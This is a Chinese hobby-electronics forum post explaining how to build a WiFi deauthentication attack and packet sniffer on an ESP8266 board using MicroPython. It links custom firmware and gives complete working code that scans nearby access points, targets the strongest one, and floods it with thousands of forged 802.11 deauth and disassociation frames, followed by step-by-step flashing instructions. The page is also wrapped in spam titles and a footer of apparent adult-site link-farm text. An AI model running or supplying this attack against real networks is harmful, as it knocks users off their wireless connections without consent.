久久久久久久999_99精品久久精品一区二区爱城_成人欧美一区二区三区在线播放_国产精品日本一区二区不卡视频_国产午夜视频_欧美精品在线观看免费

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

搜索
查看: 4576|回復(fù): 0
打印 上一主題 下一主題
收起左側(cè)

MicroPython實(shí)現(xiàn)wifi干擾與抓包

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
  0x00前言

  之前做的WIFI攻擊實(shí)驗(yàn)都是基于arduino環(huán)境開發(fā)的,最近想嘗試一下使用micropython完成deautch(解除認(rèn)證)攻擊。本次開發(fā)板使用的還是TPYBoardv202(某寶上有賣,30元),因?yàn)樗饕墓δ芫褪侵С謒icropython開發(fā)。



  0x01實(shí)現(xiàn)原理

  a)        通過查閱資料和arduino的源碼分析,了解到實(shí)現(xiàn)攻擊其實(shí)就是發(fā)送IEEE802.11協(xié)議解除認(rèn)證包,根據(jù)MAC層幀格式發(fā)送自定義的虛假deautch數(shù)據(jù)包。

  b)        調(diào)用ESP8266SDK中wifi_send_pkt_freedom函數(shù),發(fā)送攻擊包。

  0x02攻擊構(gòu)思

  a)        程序一開始掃描附件的AP。

  b)        找到信號最強(qiáng)的AP,獲取到他的MAC地址(bssid)和信道。

  c)        將TPYBoardv202切換到同攻擊AP相同的信道。

  d)        使用攻擊AP的MAC地址,組合deauth解除認(rèn)證包發(fā)送。

  0x03編譯燒寫固件及程序源碼

  1、        編譯固件

  現(xiàn)有的micropython-esp8266固件中,并沒有引出wifi_send_pkt_freedom函數(shù),于是

  我自己動手編譯了一次固件,地址:

  https://github.com/PakchoiFood/micropython-deauth

  大家可以自行下載燒寫使用,如果有的小伙伴想自己編譯修改固件的話,請參考:

  https://github.com/micropython/micropython/tree/master/esp8266

  需要注意:在編譯esp8266-sdk時,注意版本必須是1.3.0版本,否則wifi_send_pkt_freedom函數(shù)會一直返回-1失敗。

  下載后解壓,文件如下:



  firmware.bin文件:micropython-esp8266生成的固件。

  增加的內(nèi)容:

  setAttack函數(shù)

  參數(shù):int類型(信道)

  功能:設(shè)置esp8266的信道

  send_pkt_freedom函數(shù)

  參數(shù):bytes數(shù)組(定義的數(shù)據(jù)包)

  flash_download_tools_v3.3.6_win.rar:燒寫固件的工具。

  MicroPythonFileUploader.rar:用于將程序下載到TPYBoardv202Flash的工具。

  main.py文件:程序源碼文件,主要實(shí)現(xiàn)附件AP的掃描、數(shù)據(jù)包的組合和調(diào)用發(fā)送。

  1. import time
  2. import uos
  3. import wireless


  4. sta_if=wireless.attack(0)#0:STA 模式
  5. sta_if.active(True)
  6. ap_list=sta_if.scan()
  7. print(ap_list)
  8. ssid=''
  9. bssid=''#bssid:AP MAC address
  10. channel=''#信道
  11. _client=[0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]#默認(rèn)

  12. def deauth(_ap,_client,type,reason):
  13.     # 0 - 1   type, subtype c0: deauth (a0: disassociate)
  14.     # 2 - 3   duration (SDK takes care of that)
  15.     # 4 - 9   reciever (target)
  16.     # 10 - 15 source (ap)
  17.     # 16 - 21 BSSID (ap)
  18.     # 22 - 23 fragment & squence number
  19.     # 24 - 25 reason code (1 = unspecified reason)
  20.     packet=bytearray([0xC0,0x00,0x00,0x00,0xBB,0xBB,0xBB,0xBB,0xBB,0xBB,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0x00, 0x00,0x01, 0x00])
  21.     for i in range(0,6):
  22.         packet[4 + i] =_client[i]
  23.         packet[10 + i] = packet[16 + i] =_ap[i]
  24.     #set type
  25.     packet[0] = type;
  26.     packet[24] = reason
  27.     result=sta_if.send_pkt_freedom(packet)
  28.     if result==0:
  29.         time.sleep_ms(1)
  30.         return True
  31.     else:
  32.         return False
  33.    
  34. if __name__=="__main__":
  35.     max_rssid=0
  36.     max_id=0
  37.     num=0

  38.     #獲取信號最強(qiáng)的AP 進(jìn)行攻擊
  39.     for i in ap_list:
  40.         if max_rssid==0:
  41.             max_rssid=i[3]#rssid
  42.         else:
  43.             if i[3]>max_rssid:
  44.                 max_rssid=i[3]
  45.                 max_id=num
  46.         num+=1
  47.     ssid=ap_list[max_id][0]
  48.     bssid=ap_list[max_id][1]
  49.     channel=ap_list[max_id][2]
  50.     print('ssid:',ssid,'-bssid:',bssid)
  51.     print('-channel:',channel,'-rssid:',max_rssid)
  52.     sendNum=5000#攻擊次數(shù)
  53.    
  54.     print('******************************')
  55.     if sta_if.setAttack(channel):
  56.         print('Set Attack OK')
  57.         time.sleep_ms(100)
  58.         print('---deauth runing-----')
  59.         for i in range(0,sendNum):
  60.             r_=deauth(bssid, _client, 0xC0, 0x01)
  61.             if r_:
  62.                
  63.                 deauth(bssid, _client, 0xA0, 0x01)
  64.                 deauth(_client, bssid, 0xC0, 0x01)
  65.                 deauth(_client, bssid, 0xA0, 0x01)
  66.                 time.sleep_ms(5)
  67.             else:
  68.                 print('---deauth fail-------')
  69.             time.sleep_ms(5000)
復(fù)制代碼




  sniffer文件夾下的main.py實(shí)現(xiàn)網(wǎng)絡(luò)抓包功能。

  1. import wireless
  2. import time

  3. #可以指定信道1~13
  4. sniffer=wireless.sniffer(6)
  5. #0:表示從信道1開始 定時切換信道
  6. #sniffer=wireless.sniffer(0)
復(fù)制代碼




  燒寫固件

  1、        TPYBoardv202使用microUSB數(shù)據(jù)線接入電腦。查看安裝的usb轉(zhuǎn)串的端口。打開電腦的設(shè)備管理器(這里是COM57)。



  2、        解壓flash_download_tools_v3.3.6_win.rar,雙擊運(yùn)行ESPFlashDownloadTool_v3.3.6.exe。

  3、選擇firmware.bin固件文件,地址0x00000,其他參數(shù)根據(jù)下圖設(shè)置。我的COM選擇COM57,根據(jù)自己的實(shí)際端口選擇,波特率選擇115200。



  4、點(diǎn)擊【START】,界面提示等待上電同步。按住板子上的FLASH鍵不松,同時按一下RST鍵復(fù)位上電。左側(cè)空白區(qū)顯示讀取的MAC地址,狀態(tài)顯示下載中,此時松開按鍵即可。



  5、等待下載完畢,關(guān)閉軟件退出。

  下載程序

  6、解壓MicroPythonFileUploader.rar,雙擊運(yùn)行MicroPythonFileUploader.exe。



  此軟件需要.NETFramework4.2及以上版本,若打開失敗,請安裝.NETFramework后再使用。


  7、選擇COM57,點(diǎn)擊【Open】打開串口。



  8、點(diǎn)擊右側(cè)的文件夾圖標(biāo)的按鈕,選擇main.py文件。



  9、此時可以點(diǎn)擊【Send】,將程序發(fā)送給TPYBoardv202。發(fā)送成功后,程序自動運(yùn)行。



  10、接下來將sniffer下的main.py同樣的是方式下載到板子里。(文件會覆蓋)

  打開串口助手,就可以看到esp8266抓包的數(shù)據(jù)。





分享到:  QQ好友和群QQ好友和群 QQ空間QQ空間 騰訊微博騰訊微博 騰訊朋友騰訊朋友
收藏收藏1 分享淘帖 頂 踩
回復(fù)

使用道具 舉報(bào)

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

手機(jī)版|小黑屋|51黑電子論壇 |51黑電子論壇6群 QQ 管理員QQ:125739409;技術(shù)交流QQ群281945664

Powered by 單片機(jī)教程網(wǎng)

快速回復(fù) 返回頂部 返回列表
主站蜘蛛池模板: 91观看 | 精品亚洲一区二区三区 | 成人午夜激情 | 久久久国产网站 | 亚洲a一区 | 91一区二区| 亚洲成网 | 欧美一区二区在线视频 | 亚洲精品自在在线观看 | 羞羞色视频 | 噜噜噜噜狠狠狠7777视频 | 国产日韩精品一区 | 国产二区av | 国产乱码一二三区精品 | 日韩精品a在线观看图片 | 日韩在线视频播放 | 天堂一区 | 精品国产一区二区三区久久狼黑人 | 国产精品欧美日韩 | 亚洲国产成人精品女人久久久 | 国产一区二区 | 久久精品亚洲一区二区三区浴池 | 男女羞羞免费视频 | 黄色毛片在线看 | 国产精品免费在线 | 免费在线观看91 | 91精品久久久久久久久中文字幕 | 国产精品1区2区3区 国产在线观看一区 | 男人午夜视频 | 欧洲一区二区三区 | 午夜影院网站 | 精品成人免费一区二区在线播放 | 中国一级特黄毛片大片 | 91九色麻豆| 久久久久久网 | 亚洲狠狠丁香婷婷综合久久久 | 激情小说综合网 | 一区二区在线 | 九九热免费在线观看 | 草草草网站 | 成人精品一区二区三区中文字幕 |